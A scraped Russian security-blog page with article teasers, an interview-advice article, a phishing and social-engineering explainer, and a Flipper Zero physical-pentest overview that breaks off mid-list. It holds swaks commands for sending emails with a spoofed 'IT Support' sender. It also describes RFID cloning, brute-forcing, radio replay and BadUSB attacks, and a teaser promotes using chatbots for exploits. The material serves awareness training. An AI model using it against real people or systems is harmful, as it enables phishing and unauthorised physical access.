Форензика CTF: как анализировать файлы и находить скрытые данные — пошаговый гайд

Pwntools туториал: первый эксплойт для CTF pwnзадачи с нуля

Pwntools туториал: первый эксплойт для CTF pwn-задачи с нуля

Криптография CTF: разбираем Base64, XOR и шифр Цезаря на реальных задачах

OSINT CTF задачи: пошаговый разбор — от никнейма до геолокации по фото

Взлом хэшей в CTF: John the Ripper и Hashcat от нуля до первого флага

Стеганография в CTF: чеклист и инструменты для поиска скрытых данных в картинках и аудио

Burp Suite для начинающих: перехватываем запросы и находим первый флаг в вебзадаче CTF

Burp Suite для начинающих: перехватываем запросы и находим первый флаг в веб-задаче CTF

Linux команды для CTF: шпаргалка с примерами из реальных тасков

Ghidra реверс инжиниринг: разбираем первый бинарник в CTFзадаче по реверсу

Ghidra реверс инжиниринг: разбираем первый бинарник в CTF-задаче по реверсу

Wireshark CTF анализ трафика: как читать pcapфайлы и находить флаги

Wireshark CTF анализ трафика: как читать pcap-файлы и находить флаги

SQLинъекция для начинающих: от теории к первому флагу на практике

SQL-инъекция для начинающих: от теории к первому флагу на практике

Узнайте, какие профессии существуют в кибербезопасности. Разбираем роли Red, Blue и Purple Team, навыки, задачи и направления для старта карьеры.

Выбираем свой путь в кибербезопасности: полный гид по специализациям

Разбираем, как подготовиться к первому собеседованию в сфере ИБ, преодолеть страх и показать уверенность без большого опыта - советы и практика от HackerLab.

<!DOCTYPE html>
<html lang="ru">
<head>
  <meta charset="utf-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <title>Начало карьеры в кибербезопасности — HTML версия</title>
  <meta name="description" content="Как преодолеть страх перед собеседованием и реально начать карьеру в кибербезопасности: что проверяют работодатели, примеры вопросов и работа с барьерами." />
  <meta name="keywords" content="кибербезопасность, собеседование, начало карьеры, психологические барьеры, вопросы на собеседовании, советы" />
  <script type="application/ld+json">
    {
      "@context": "https://schema.org",
      "@type": "Article",
      "headline": "Начало карьеры в кибербезопасности: как преодолеть страх перед собеседованием",
      "description": "Что реально ждут работодатели на собеседовании, примеры вопросов и как справляться с психологическими барьерами новичка в кибербезопасности.",
      "inLanguage": "ru",
      "author": { "@type": "Organization", "name": "HackerLab" },
      "publisher": {
        "@type": "Organization",
        "name": "HackerLab",
        "logo": { "@type": "ImageObject", "url": "https://hackerlab.pro/favicon.ico" }
      },
      "mainEntityOfPage": {
        "@type": "WebPage",
        "@id": "https://hackerlab.pro/blog/nachalo-karyery-v-kiberbezopasnosti"
      }
    }
  </script>
</head>
<body>

<h3>Начало карьеры в кибербезопасности: как преодолеть страх перед собеседованием</h3>

<p>Многие, кто только задумываются о старте карьеры в кибербезопасности, сталкиваются с ощущением, что отрасль недоступна новичкам. Кажется, что собеседования требуют огромного багажа знаний, что все кандидаты — гении, а любое промедление с ответом равнозначно провалу. Эти опасения естественны, но важно понимать: это психологический барьер, а не объективная реальность.</p>
<p>Даже самые опытные специалисты, которые сегодня уверенно работают в SOC, внедряют сложные системы защиты или проводят пентесты, когда-то сталкивались с незнакомыми терминами и базовыми вопросами. Страх перед первым шагом — нормальное явление, и его можно преодолеть.</p>

<div data-toc="Понимание собеседования: чего на самом деле ждут работодатели" id="understanding"></div>
<h3 id='понимание-собеседования-чего-на-самом-деле-ждут-работодатели'>Понимание собеседования: чего на самом деле ждут работодатели</h3>
<p>Собеседование — это не экзамен с жёсткими правильными и неправильными ответами. </p>
<blockquote>Чтобы не бояться вопросов по базовым инструментам, заранее повтори системные команды из материала <a href="https://hackerlab.pro/blog/linux-dlya-hakera">«Linux для хакера»</a>.</blockquote>
<p>Основные цели работодателя:</p>

<h3 id='оценка-мышления-и-подхода-к-задачам'>Оценка мышления и подхода к задачам</h3>
<p>Работодатели интересуются не только тем, знает ли кандидат конкретный протокол или команду, но и как он подходит к решению задач. Например:</p>
<ol>
  <li>Может ли кандидат логически рассуждать и строить цепочку своих действий.</li>
  <li>Способен ли он выявлять проблему и предлагать шаги по её решению.</li>
  <li>Умеет ли структурировать информацию и объяснять её доступно.</li>
  <p>Даже если кандидат не знает точного ответа на технический вопрос, правильный подход к рассуждению часто ценится выше, чем правильный ответ, но данный без объяснений. Конечно же не стоит рассчитывать на способность «придумать» ответ на любой вопрос без базовых знаний </p>
</ol>

<h3 id='проверка-готовности-к-обучению'>Проверка готовности к обучению</h3>
<p>Кибербезопасность — быстро меняющаяся сфера. Каждый день появляются новые уязвимости, инструменты и методы защиты. Работодатель хочет понять, насколько кандидат способен:</p>
<ol>
  <li>Быстро усваивать новую информацию.</li>
  <li>Применять изученное на практике.</li>
  <li>Адаптироваться к изменениям в технологиях и процессах.</li>
</ol>
<p>Таким образом, собеседование оценивает не только текущие знания, но и потенциал роста.</p>

<h3 id='оценка-стрессоустойчивости-и-реакции-на-неизвестное'>Оценка стрессоустойчивости и реакции на неизвестное</h3>
<p>Иногда на собеседовании задаются вопросы, ответы на которые новичок может не знать. Это делается намеренно. Работодателю важно увидеть:</p>
<ol>
  <li>Как кандидат реагирует на неизвестные ситуации.</li>
  <li>Сохраняет ли он спокойствие под давлением.</li>
  <li>Использует ли он логические рассуждения, даже если ответа нет.</li>
  <p>Спокойная и системная реакция на трудный вопрос часто ценится больше, чем мгновенный правильный ответ, потому что на практике специалисты сталкиваются с непредсказуемыми задачами и угрозами.</p>
</ol>

<h3 id='оценка-коммуникативных-навыков-и-умения-работать-в-команде'>Оценка коммуникативных навыков и умения работать в команде</h3>
<p>Собеседование — это не только проверка технических знаний. Большинство позиций в ИБ требуют взаимодействия с коллегами, смежными отделами и, иногда, заказчиками. Работодатель оценивает:</p>
<ol>
  <li>Насколько понятно кандидат излагает мысли.</li>
  <li>Умеет ли он слушать и уточнять вопросы.</li>
  <li>Готов ли работать в команде, делиться информацией и помогать коллегам.</li>
  <p>Даже блестящее знание технологий не компенсирует слабые коммуникативные навыки, поэтому важно демонстрировать открытость, ясность и способность к сотрудничеству.</p>
</ol>

<div data-toc="Реальные примеры вопросов" id="examples"></div>
<h3 id='реальные-примеры-вопросов'>Реальные примеры вопросов</h3>
<p>На собеседованиях по разным направлениям информационной безопасности встречаются самые разные вопросы. Для наглядности приведём несколько примеров:</p>
<ol>
  <li>«По какому порту работает PING?»</li>
  <li>«В чём отличие IDS от IPS?»</li>
  <li>«Что такое NAT?»</li>
  <li>«Какие уровни модели OSI и TCP/IP существуют?»</li>
  <li>«Какие уязвимости описывает OWASP?»</li>
  <li>«Как работает PKI?»</li>
  <li>«Какие ожидания по зарплате?»</li>
  <p>На первый взгляд, некоторые из этих вопросов могут показаться пугающими и сложными. Например, «Как работает PKI?» или «Какие атрибуты маршрута в eBGP?». Однако, можно заметить, что все они строятся на базовых концепциях, которые доступны для изучения:</p>
  <li><strong>Базовые технологии — это ключ.</strong> Если освоить основные протоколы, принципы работы сетей, криптографию и модели защиты, большая часть вопросов становится понятной и логичной. Например, понимание разницы между IDS и IPS приходит естественно, если знать, что IDS только отслеживает события, а IPS — ещё и блокирует их.</li>
  <li><strong>Сложность часто в терминологии, а не в сути.</strong> Иногда вопрос кажется «экзотическим», но если разобрать его шаг за шагом, он сводится к базовым принципам. Например, вопрос про порт PING проверяет знание ICMP, и как только этот протокол изучен, ответ очевиден.</li>
  <li><strong>Вопросы — ориентиры для изучения.</strong> Даже если изначально какая-то тема кажется сложной, она задаёт направление, в котором стоит развиваться. В процессе подготовки к собеседованию новичок постепенно выстраивает «связки» между базовыми знаниями и более сложными концепциями.</li>
  <li><strong>Практика делает сложное простым.</strong> Работа с виртуальными лабораториями, тестовыми сценариями, разбор реальных кейсов позволяет увидеть, что вопросы, которые раньше казались непроходимыми, становятся понятными и логичными. Например, настройка SSH-туннеля или понимание NAT после практики в виртуальной сети уже не пугает.</li>
</ol>
<p>Таким образом, можно сделать вывод: <strong>пугающие на первый взгляд вопросы перестают быть сложными после освоения базовой технологической основы</strong>. Главное — не пытаться сразу знать всё, а строить знания постепенно, соединяя теорию и практику.</p>
<p>С каждым новым изученным понятием и практическим примером сложные вопросы становятся простыми и даже предсказуемыми, а собеседование превращается не в экзамен, а в разговор, в котором кандидат может уверенно продемонстрировать свои навыки и логику рассуждений.</p>

<div data-toc="Психологические барьеры и как с ними справляться" id="barriers"></div>
<h3 id='психологические-барьеры-и-как-с-ними-справляться'>Психологические барьеры и как с ними справляться</h3>
<img src="https://hackerlab.pro/game_api/articles/static/5a438601-2299-4a41-bfd4-fd80f9f2c073/experience.png" alt="Опыт">

<h3 id='страх-нехватки-опыта'>Страх нехватки опыта. </h3>
<p>Некоторые кандидаты опасаются, что отсутствие реального стажа означает «невозможность устроиться». На практике руководители отмечают: честность в резюме и готовность учиться ценятся больше, чем преувеличенный опыт. Попытки «накрутить» стаж в резюме стали легко проверяться, а риск спалиться слишком велик. </p>

<h3 id='страх-провала-на-техническом-вопросе'>Страх провала на техническом вопросе.</h3>
<p>Ошибки — нормальная часть процесса. Руководители отмечают, что навыки быстрого поиска информации часто ценятся даже выше, чем знание всех ответов. Если кандидат может быстро найти решение без паники, это демонстрирует ценное умение, которое пригодится в реальной работе. </p>

<h3 id='неуверенность-в-себе'>Неуверенность в себе.</h3>
<p>Чувство, что нужно «читерить» или подглядывать во время собеседования, часто связано с внутренними требованиями к себе, а не с реальной необходимостью. Руководители советуют рассматривать это как часть процесса обучения: если человек умеет грамотно искать информацию и объяснять свои действия, это демонстрирует зрелость и адаптивность.</p>

<div data-toc="Почему начинать реально" id="why-start"></div>
<h3 id='почему-начинать-реально'>Почему начинать реально</h3>
<p>Сфера кибербезопасности открыта для тех, кто готов учиться, несмотря на отсутствие опыта. Страх перед первым шагом — это естественное ощущение, но он не должен блокировать развитие. Начало карьеры — это серия маленьких шагов: изучение базовых концепций, практика, общение с коллегами и постепенное повышение квалификации.</p>
<p>Ошибки, неполные ответы или необходимость подсказывать себе информацию в процессе собеседования — это нормальная часть пути. На самом деле такие навыки, как умение быстро искать и применять информацию, часто ценятся выше, чем идеальная память.</p>
<p>Можно сделать вывод: страх — это лишь психологический барьер. Если сосредоточиться на обучении, честности и постепенном накоплении опыта, путь в профессию становится доступным. Начать реально, и каждый следующий шаг будет даваться легче, принося новые знания, навыки и уверенность.</p>

</body>
</html>


Как начать карьеру в кибербезопасности и уверенно пройти первое собеседование

Разбираем команды Linux, нужные каждому хакеру: работа с файлами, поиск, сетевые утилиты, терминал и безопасность. Полное руководство для новичков.

Linux для хакера: базовые команды и скрипты, которые нужно знать

Разбор пакера UPX: структура PE-файлов, точка входа (OEP), импорт, скрамблеры и ручная распаковка с примерами.

Мощь и беспомощность пакера UPX

Разбираем, как работает фишинг и приёмы социальной инженерии: психологические триггеры, примеры атак и защита сотрудников на практике.

<!DOCTYPE html>
<html lang="ru">
<head>
    <meta charset="UTF-8">
    <title>Фишинг и социальная инженерия: техники атак и защита</title>
    <meta name="description"
          content="Разбираем, как работает фишинг и приёмы социальной инженерии: психологические триггеры, примеры атак и защита сотрудников на практике.">
    <meta name="keywords"
          content="фишинг, социальная инженерия, психологические триггеры фишинга, примеры фишинговых атак, защита от фишинга, phishing attacks, pretexting, обучение сотрудников безопасности, swaks phishing test, кибербезопасность">
</head>
<body>
<blockquote>
    <p>Данная статья подготовлена исключительно в образовательных и информационных целях в рамках темы кибербезопасности
        и
        повышения осведомленности. Вся представленная информация предназначена для законного применения</p>
</blockquote>
<div data-toc="Введение" id="introduction"></div>
<h3>Введение</h3>
<p>Почему одни люди с лёгкостью получают доступ к закрытой информации, а другим безоговорочно доверяют пароли? Это не
    магия, а наука под названием социальная инженерия — искусство управления человеческим поведением. К сожалению, этот
    вектор атаки часто остаётся в тени, и многие его грубо недооценивают, сосредотачиваясь на технологических средствах
    защиты, забывая о самом уязвимом звене — человеке. Возникает закономерный вопрос: «Как такое простое мошенничество
    может быть таким эффективным?». </p>
<p>Социальная инженерия — это совокупность техник, где главным «инструментом» является человеческое поведение, а не
    уязвимость в коде. Технические средства (файерволы, антивирусы, фильтры) важны, но именно человек чаще всего
    становится проводником атаки: от предоставления пароля до клика по вредоносной ссылке.</p>
<div data-toc="Психологические триггеры: кнопки, на которые нажимают мошенники" id="psychological-triggers"></div>
<h3>Психологические триггеры: кнопки, на которые нажимают мошенники</h3>
<p>Прежде чем перейти к техникам, важно понять почему они работают. Все атаки используют фундаментальные принципы
    человеческой психологии. Похожие приёмы используются и в реверс‑инжиниринге — см. статью <a
            href="https://hackerlab.pro/blog/skripty-i-funktsii-v-x64dbg" target="_blank" rel="noopener">Скрипты и
        функции в x64dbg</a>.</p>
<div data-toc="Срочность / страх потери" id="urgency-fear-of-loss"></div>
<h3>Срочность / страх потери</h3>
<p>Как используется: сообщения создают искусственную нехватку времени — «подтвердите в течение часа», «срок истекает
    сегодня».</p>
<p>Почему работает: люди склонны принимать рискованные решения, чтобы избежать потери, и действуют импульсивно при
    дефиците времени.</p>
<p>Типичные фразы:</p>
<ul>
    <li>«Ваш аккаунт будет заблокирован через 24 часа»</li>
    <li>«Не упустите вознаграждение — акция заканчивается сегодня»</li>
</ul>
<p>Признаки фишинга: нелогичное давление времени, отсутствие деталей, ссылка вместо инструкции посетить официальный
    портал.</p>
<div data-toc="Авторитет" id="authority"></div>
<h3>Авторитет</h3>
<p>Как используется: атаки от имени руководителей, IT, HR, банка, налоговой.</p>
<p>Почему работает: люди обычно подчиняются фигурам, воспринимаемым как авторитеты </p>
<p>Типичные фразы:</p>
<ul>
    <li>«От: CEO — Прошу срочно выполнить платеж»</li>
    <li>«ИТ-служба просит обновить данные»</li>
</ul>
<p>Признаки фишинга: несоответствие email-адреса, отсутствие подписи или контактных данных, необычное поведение (запрос
    вне норм процесса).</p>
<div data-toc="Социальное доказательство" id="social-proof"></div>
<h3>Социальное доказательство</h3>
<p>Как используется: «75% ваших коллег уже заполнили форму», «коллеги подтвердили» — создают давление
    соответствовать.</p>
<p>Почему работает: люди ориентируются на поведение группы, предполагая, что большинство знает лучше.</p>
<p>Типичные фразы:</p>
<ul>
    <li>«Все в отделе подтвердили»</li>
    <li>«Ваш коллега Иван уже прошёл»</li>
</ul>
<p>Признаки фишинга: ссылки на несуществующие внутренние ресурсы, массовые сообщения без персонализации, попытки вовлечь
    через внутренние чаты.</p>
<div data-toc="Взаимность" id="reciprocity"></div>
<h3>Взаимность</h3>
<p>Как используется: мошенник делает «услугу» (подарок, бонус) и ожидает ответной реакции — пользователь готов отплатить
    информацией или действием.</p>
<p>Почему работает: норма взаимности — люди чувствуют обязательство отвечать добром за добро.</p>
<p>Типичные фразы:</p>
<ul>
    <li>«Бесплатный подарок — скачайте»</li>
    <li>«Мы подготовили бонус только для Вас»</li>
</ul>
<p>Признаки: неожиданные вложения/ссылки, просьбы «в знак благодарности» предоставить данные.</p>
<div data-toc="Последовательность" id="consistency"></div>
<h3>Последовательность</h3>
<p>Как используется: сначала мелкая просьба (подтвердите почту), затем — большая (сдать паспортные данные).</p>
<p>Почему работает: люди стремятся быть последовательными со своими предыдущими действиями.</p>
<p>Типичные фразы:</p>
<ul>
    <li>«Просто подтвердите этот маленький шаг…»</li>
</ul>
<p>Признаки: серия писем с непримечательными требованиями, которые эскалируются.</p>
<div data-toc="Базовые техники: Узнай врага в лицо" id="basic-techniques"></div>
<h3>Базовые техники: Узнай врага в лицо</h3>
<div data-toc="1. Фишинг: Массовая «ловля» доверия" id="phishing"></div>
<h3>1. Фишинг: Массовая «ловля» доверия</h3>
<p>Что это? Массовая рассылка поддельных писем или сообщений, маскирующихся под легитимные источники (банк, соцсеть,
    коллега). Прямая атака на триггеры срочности и страха.</p>
<p>Пример письма (с разбором триггеров):</p>
<img src="https://hackerlab.pro/game_api/articles/static/51483eff-6774-4897-a663-81d206876a9a/1.jpg" alt="1">

<div data-toc="2. Претекстинг (Pretexting): Искусство легенды" id="pretexting"></div>
<h3>2. Претекстинг (Pretexting): Искусство легенды</h3>
<p>Что это? Более продвинутая и целевая техника. Злоумышленник заранее придумывает правдоподобный предлог (легенду) и
    вживается в роль, чтобы выудить информацию. Использует авторитет и последовательность. Подобные элементы социальной
    инженерии нередко встречаются в заданиях на соревнованиях. Подробнее читайте в <a
            href="https://hackerlab.pro/blog/ctf-zadaniya-2025-ot-idei-do-deploja-polnyj-gajd" target="_blank"
            rel="noopener">CTF‑задания 2025: от идеи до деплоя</a>.</p>
<img src="https://hackerlab.pro/game_api/articles/static/51483eff-6774-4897-a663-81d206876a9a/2.jpg" alt="2">
<div data-toc="Знакомство с Swaks для тестовых рассылок" id="swaks-intro"></div>
<h3>Знакомство с Swaks для тестовых рассылок</h3>
<p>Swaks (Swiss Army Knife for SMTP) — это «швейцарский нож» для тестирования почтовых серверов. Он позволяет вручную
    отправлять письма через SMTP, подставлять заголовки, проверять работу TLS/аутентификации и даже эмулировать учебные
    фишинговые письма в безопасной среде.</p>
<p>Установить программу можно буквально одной командой. Например, в системах на базе Ubuntu достаточно выполнить sudo
    apt install swaks, а пользователи macOS могут воспользоваться Homebrew: brew install swaks. После установки утилита
    готова к работе и не требует сложной настройки.</p>
<img src="https://hackerlab.pro/game_api/articles/static/51483eff-6774-4897-a663-81d206876a9a/3.jpg" alt="3">
<pre><code>brew install swaks
или
apt install swaks</code></pre>
<p>Главное удобство Swaks заключается в том, что письмо можно «собрать» прямо из командной строки. Мы указываем
    получателя, подставляем адрес отправителя, формируем тему и тело письма, а затем отправляем его через выбранный
    SMTP-сервер. Например, простая команда может выглядеть так:</p>
<img src="https://hackerlab.pro/game_api/articles/static/51483eff-6774-4897-a663-81d206876a9a/4.jpg" alt="4">
<pre><code>swaks \
  --to test.employee@company.local \
  --from &quot;IT Support &lt;itsupport@company.local&gt;&quot; \
  --server smtp.company.local \
  --header &quot;Subject: [Учебно] Проверка доставки&quot; \
  --body &quot;Это учебное письмо для проверки работы почтового шлюза.&quot;</code></pre>
<p>После её выполнения Swaks не просто отправит сообщение, но и выведет пошаговый лог диалога с сервером. Такой отчёт
    особенно полезен для отладки: видно, как сервер принимает команду MAIL FROM, реагирует на RCPT TO, обрабатывает
    заголовки и тело письма. Кроме текста, в письме можно использовать заранее подготовленные шаблоны или даже
    прикреплять вложения. Для этого достаточно передать в команду параметры --body (указав путь к текстовому файлу) и
    --attach (путь к приложению). Такой подход позволяет проводить более реалистичные тренировки: например, имитировать
    рассылку с «важным документом» и затем обсуждать с сотрудниками, почему нельзя открывать неизвестные вложения.</p>
<img src="https://hackerlab.pro/game_api/articles/static/51483eff-6774-4897-a663-81d206876a9a/5.jpg" alt="5">
<pre><code>swaks \
  --to staff@company.local \
  --from &quot;security@company.local&quot; \
  --server smtp.company.local \
  --header &quot;Subject: [Учебно] Важная информация&quot; \
  --body ./templates/warning.txt \
  --attach ./attachments/safe_guide.pdf</code></pre>
<div data-toc="Заключение" id="conclusion"></div>
<h3>Заключение</h3>
<p>Фишинг и другие приёмы социальной инженерии остаются одними из самых опасных угроз для организаций любого масштаба.
    Главная причина их эффективности проста: они эксплуатируют человеческую психологию, а не технические уязвимости.
    Даже самые современные системы защиты не смогут гарантировать безопасность, если сотрудник поддастся на уловку и сам
    откроет злоумышленнику дверь.</p>
<p>Поэтому борьба с фишингом невозможна только силами технологий. Антивирусы, фильтры и почтовые шлюзы снижают
    количество опасных писем, но окончательное решение всегда принимает человек. Именно поэтому ключевым элементом
    защиты становится культура безопасности: регулярное обучение, практика на реальных примерах, тренировки в виде
    учебных рассылок и готовность сотрудников задавать вопросы, а не действовать импульсивно.</p>
</body>
</html>

Фишинг и социальная инженерия: психология атак и методы защиты

Разбираем, как выглядят и создаются окна кейгенов (KeyGen): упаковка PECompact, TLS, поиск OEP, ловля DialogBoxParam, использование GDI32 для интерфейса и демо-код. Материал — для обучения.

Создание окон KeyGen: анализ упаковки, поиск OEP и интерфейс на GDI32 (демо-код)

Как ускорить реверс с помощью скриптов в x64dbg. Примеры сценариев и функций: работа со структурами, VirtualAlloc, callback-и и сохранение дампов памяти. Полный гайд для начинающих реверсеров.

Скрипты и функции в x64dbg: автоматизация реверса и примеры

Как использовать ChatGPT и Claude для эксплойтов, автоматизировать пентесты и защищаться от ML-атак. Практические кейсы и готовые инструменты.

AI в кибербезопасности 2025: практическое руководство пентестера

Создание CTF-заданий с нуля: Docker изоляция, динамические флаги, тестирование уязвимостей. Практическое руководство с примерами кода для всех категорий.

CTF-задания 2025: от идеи до деплоя | Полный гайд

Flipper Zero позволяет тестировать RFID, USB, NFC и Sub-GHz устройства. Узнай, как использовать его в физическом пентесте: примеры, техники, утилиты.

<!DOCTYPE html>
<html lang="ru">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description"
          content="Flipper Zero позволяет тестировать RFID, USB, NFC и Sub-GHz устройства. Узнай, как использовать его в физическом пентесте: примеры, техники, утилиты.">
    <meta name="keywords"
          content="модель OSI, основы сетей, информационная безопасность, сети для новичков, пентест, сетевые протоколы, TCP/IP, ARP, уровни OSI, уязвимости сети">
    <title>Flipper Zero: универсальный гаджет для физического пентеста</title>
</head>
<body>

<blockquote>⚠️ Важно: Информация в этой статье предоставляется исключительно в образовательных целях. Использование
    описанных техник и устройств без согласия владельца оборудования и вне рамок легального тестирования на
    проникновение является нарушением закона. Автор и платформа не несут ответственности за противоправное применение
    изложенного материала.
</blockquote>

<div data-toc="Введение" id="introduction"></div>
<h3>Введение</h3>

<p>В сфере информационной безопасности традиционно акцент делается на программные векторы атак: уязвимости в
    приложениях, ошибки в настройках серверов, слабые пароли и т.д. Однако в реальном мире компрометация часто
    начинается с физического доступа: к компьютеру, серверной, RFID-замку или даже беспроводному пульту от шлагбаума.
    Поэтому физические устройства в пентесте — это не экзотика, а практический инструмент, позволяющий оценить реальный
    уровень устойчивости инфраструктуры.</p>

<p>В арсенале современного пентестера всё чаще появляются такие гаджеты, как Flipper Zero, Rubber Ducky, Proxmark3,
    Raspberry Pi Zero и другие. Они позволяют протестировать не только сетевую защиту, но и:</p>

<ul>
    <li>работу систем контроля и управления доступом (СКУД);</li>
    <li>безопасность USB-портов;</li>
    <li>защиту от внешних подключений;</li>
    <li>уязвимости в протоколах беспроводной связи.</li>
</ul>

<div data-toc="Для чего используются физические устройства при проведении работ по тестированию на проникновение"
     id="hardware-pentest-tools"></div>
<h3>Для чего используются физические устройства при проведении работ по тестированию на проникновение</h3>

<p>Вот основные сценарии, в которых физические устройства могут быть полезны во время тестирования на проникновение:</p>

<p><b>1. Атаки на системы контроля доступа (СКУД)</b></p>
<p>RFID/NFC карты, которыми сотрудники открывают двери, часто не защищены криптографически. Устройства вроде Flipper
    Zero или Proxmark3 позволяют:</p>

<ul>
    <li>считывать карты на расстоянии до 5 см;</li>
    <li>клонировать и эмулировать идентификаторы;</li>
    <li>осуществлять перебор ID (bruteforce);</li>
    <li>прослушивать взаимодействие между считывателем и картой.</li>
</ul>

<p><b>2. USB-атаки и физическое внедрение</b></p>

<p>Устройства, эмулирующие клавиатуру (HID-атаки), могут подключаться к открытому USB-порту и мгновенно выполнять
    команды от имени пользователя. Самые популярные инструменты:</p>

<ul>
    <li>Rubber Ducky — флешка, запускающая запрограммированные скрипты;</li>
    <li>Flipper Zero (BadUSB) — превращается в клавиатуру, вводит команды, открывает терминал и скачивает полезную
        нагрузку;
    </li>
    <li>Digispark — минималистичный вариант на базе ATtiny85, тоже выполняет скрипты.</li>
</ul>

<p><b>3. Беспроводные атаки</b></p>

<p>Многие компании используют брелоки, пульты, датчики, камеры и другие устройства на Sub-GHz частотах (315/433/868/915
    MHz). Уязвимые системы:</p>

<ul>
    <li>могут не использовать шифрование;</li>
    <li>подвержены воспроизведению записанных сигналов (replay-атаки);</li>
    <li>в ряде случаев реагируют даже на слегка измененный сигнал.</li>
</ul>

<p>Flipper Zero и Yard Stick One позволяют сканировать, записывать и воспроизводить радиосигналы — от открытия ворот до
    управления беспроводными розетками.</p>

<p><b>4. Инфракрасные атаки</b></p>

<p>ИК-порты до сих пор применяются в кондиционерах, телевизорах, проекторах и прочих устройствах. Flipper Zero может
    заменить универсальный пульт и управлять такими устройствами, например:</p>

<ul>
    <li>включать проекционное оборудование;</li>
    <li>менять настройки на мониторах;</li>
    <li>переключать презентации (что можно использовать при социальной инженерии).</li>
</ul>

<p><b>5. Инжиниринг на низком уровне (GPIO, UART, JTAG)</b></p>

<p>Для оценки защищённости IoT-устройств, роутеров и микроконтроллеров применяются пины отладки (GPIO), интерфейсы UART,
    JTAG. Через них можно:</p>

<ul>
    <li>получить shell-доступ;</li>
    <li>сбросить пароли;</li>
    <li>извлечь прошивку;</li>
    <li>обойти аутентификацию.</li>
</ul>

<p>Flipper Zero, Raspberry Pi, Bus Pirate и аналогичные устройства позволяют подключаться к таким интерфейсам и
    взаимодействовать с железом напрямую.</p>

<div data-toc="Flipper Zero" id="flipper-zero"></div>
<h3>Flipper Zero</h3>

<p>Flipper Zero — это многофункциональное устройство, которое совмещает в себе функции сразу нескольких популярных
    гаджетов. Оно выполнено в компактном корпусе, имеет дисплей и кнопки управления, а также модульную архитектуру.
    Поддерживается официально и сообществом, работает “из коробки”, но может быть расширено пользовательскими плагинами
    и прошивками.</p>

<p>Ключевые функции:</p>

<ul>
    <li>RFID (125kHz): чтение, запись, клонирование карт EM-Marine, HID Prox и др.;</li>
    <li>NFC (13.56 MHz): работа с картами Mifare, ePass, банковскими метками;</li>
    <li>Sub-GHz: управление радиоустройствами, взлом шлагбаумов, гаражных ворот, сигнализаций;</li>
    <li>IR: универсальный пульт, управление бытовой техникой;</li>
    <li>BadUSB: выполнение HID-атак;</li>
    <li>Bluetooth LE: взаимодействие с приложениями, BLE-спам и атаки;</li>
    <li>GPIO/UART: подключение к микроконтроллерам, анализ протоколов.</li>
</ul>

<div data-toc="Самые популярные приложения для Flipper Zero из официального магазина приложений"
     id="popular-apps"></div>
<h3>Самые популярные приложения для Flipper Zero из официального магазина приложений</h3>

<p><b>1. iButton Fuzzer</b></p>

<p>iButton Fuzzer — это утилита для Flipper Zero, предназначенная для фаззинга устройств, работающих с iButton-ключами
    (протокол Dallas 1-Wire). Приложение отправляет к считывателю случайно сгенерированные 8-байтные идентификаторы
    (ID), имитируя подключение iButton-устройств.</p>

<p>Основные возможности:</p>

<ul>
    <li>Генерация и отправка случайных iButton ID;</li>
    <li>Поддержка ручного или автоматического перебора;</li>
    <li>Логирование срабатываний, если считыватель реагирует.</li>
</ul>

<p>Применение:</p>

<ul>
    <li>Проверка стойкости систем доступа, основанных на iButton (электронные ключи Touch Memory);</li>
    <li>Попытка подбора, действующего ID при слабой реализации контроля;</li>
    <li>Тестирование на уязвимость к перебору или некорректной обработке данных</li>
</ul>

<img src="https://hackerlab.pro/game_api/articles/static/49e71f0e-b334-4bea-ad88-25d610de5c08/ibutton_fuzzer.png"
     alt="iButton Fuzzer">

<p><b>2. RFID Fuzzer</b></p>

<p>RFID Fuzzer — это приложение для Flipper Zero, предназначенное для фаззинга (массовой отправки случайных или
    сгенерированных RFID-идентификаторов) в диапазоне 125 кГц. Оно позволяет протестировать реакцию RFID-считывателей на
    непредсказуемые или некорректные UID.</p>

<p>Зачем используется:</p>

<ul>
    <li>Проверка устойчивости системы контроля доступа к произвольным идентификаторам;</li>
    <li>Поиск багов или некорректной обработки UID на стороне считывателя;</li>
    <li>Возможность случайно подобрать рабочий идентификатор на незащищённых системах.</li>
</ul>

<img src="https://hackerlab.pro/game_api/articles/static/49e71f0e-b334-4bea-ad88-25d610de5c08/rfid_fuzzer.png"
     alt="RFID Fuzzer">

<p><b>3. PC Monitor</b></p>

<p>PC Monitor — это приложение для Flipper Zero, позволяющее отслеживать события включения и выключения компьютеров
    через питание USB-порта. Оно работает как детектор активности: если компьютер подает питание на USB, Flipper это
    фиксирует и отображает в журнале.</p>

<p>Основные функции:</p>

<ul>
    <li>Определение момента включения и выключения ПК;</li>
    <li>Фиксация времени подачи и снятия питания;</li>
    <li>Возможность использовать Flipper как “USB-датчик активности”, например, для наблюдения за состоянием серверов,
        рабочих станций или чужого оборудования.
    </li>
</ul>

<p>Применение:</p>

<ul>
    <li>Пассивный мониторинг компьютеров без установки софта;</li>
    <li>Информативное логирование активности машин;</li>
    <li>Используется как элемент социальной инженерии или физического аудита (например, проверка, когда сотрудник
        включил рабочее устройство).
    </li>
</ul>

<img src="https://hackerlab.pro/game_api/articles/static/49e71f0e-b334-4bea-ad88-25d610de5c08/pc_monitor.png"
     alt="PC Monitor">

<p><b>4. Mifare Fuzzer</b></p>

<p>Mifare Fuzzer — это приложение для Flipper Zero, предназначенное для фаззинга MIFARE-карт (13.56 MHz, ISO14443-A).
    Оно позволяет отправлять большое количество случайных или сгенерированных запросов к NFC-считывателю, чтобы
    протестировать его реакцию на нестандартные или поврежденные данные.</p>

<p>Основные возможности:</p>

<ul>
    <li>Генерация случайных UID и команд;</li>
    <li>Атака на считыватель с целью выявления уязвимостей;</li>
    <li>Помогает проверить, насколько корректно устройство обрабатывает некорректные или неизвестные данные.</li>
</ul>

<p>Применение:</p>

<ul>
    <li>Аудит систем доступа на базе MIFARE (например, MIFARE Classic, Ultralight и др.);</li>
    <li>Проверка устойчивости NFC-инфраструктуры к фаззинг-атакам;</li>
    <li>Исследования уязвимостей в проприетарных протоколах и прошивках считывателей.</li>
</ul>

<img src="https://hackerlab.pro/game_api/articles/static/49e71f0e-b334-4bea-ad88-25d610de5c08/mifare_fuzzer.png"
     alt="Mifare Fuzzer">

<p><b>5. Eye Saver</b></p>

<p>Eye Saver — это приложение для Flipper Zero, созданное для реализации правила 20-20-20, которое используется для
    защиты глаз при длительной работе за экраном. Согласно этому принципу:</p>

<p>Каждые 20 минут нужно смотреть на объект на расстоянии 20 футов (примерно 6 метров) в течение 20 секунд.</p>

<p>Что делает Eye Saver:</p>

<ul>
